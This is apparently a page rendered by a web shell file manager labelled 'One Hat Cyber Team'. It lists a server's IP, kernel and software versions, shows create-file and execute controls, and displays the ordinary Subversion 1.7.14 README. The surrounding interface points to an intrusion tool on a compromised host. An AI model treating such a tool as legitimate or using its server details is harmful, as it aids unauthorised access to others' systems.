⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.94
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Server Software:
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
subversion-1.7.14
/
View File Name :
README
Subversion, a version control system. ===================================== $LastChangedDate: 2011-06-30 17:54:40 +0000 (Thu, 30 Jun 2011) $ Contents: I. A FEW POINTERS II. DOCUMENTATION III. PARTICIPATING IN THE SUBVERSION COMMUNITY IV. QUICKSTART GUIDE V. CONVERTING FROM CVS I. A FEW POINTERS For an overview of the Subversion project, visit http://subversion.apache.org/ Once you have a Subversion client you can get the latest version of the code with the command: $ svn co http://svn.apache.org/repos/asf/subversion/trunk subversion II. DOCUMENTATION The main documentation is the Subversion Book - an on-line version can be found at: http://svnbook.red-bean.com/ It is written in DocBook XML, and the sources can be found at: http://svnbook.googlecode.com/svn/trunk/ If you wish to build the documentation from source, read the src/en/README file within the book source. III. PARTICIPATING IN THE SUBVERSION COMMUNITY First, read http://subversion.apache.org/docs/community-guide/ It describes Subversion coding and log message standards, as well as how to join discussion lists. Talk on IRC with developers: irc.freenode.net, channel #svn-dev. Read the FAQ: http://subversion.apache.org/faq.html IV. QUICKSTART GUIDE See the final section of the first chapter of the Subversion Book. V. CONVERTING FROM CVS If you're a CVS user trying to move your CVS history over to Subversion, then be sure to visit the 'cvs2svn' project: http://cvs2svn.tigris.org You can get the latest released version of the cvs2svn converter from the project downloads area: http://cvs2svn.tigris.org/servlets/ProjectDocumentList?folderID=2976 Please note that the cvs2svn project is a *separate* project from Subversion. If you have problems with cvs2svn or are confused, please email the cvs2svn project's mailing lists, not the Subversion lists. Finally, be sure to see Appendix B in the Subversion Book. It contains a very quick overview of the major differences between CVS and Subversion.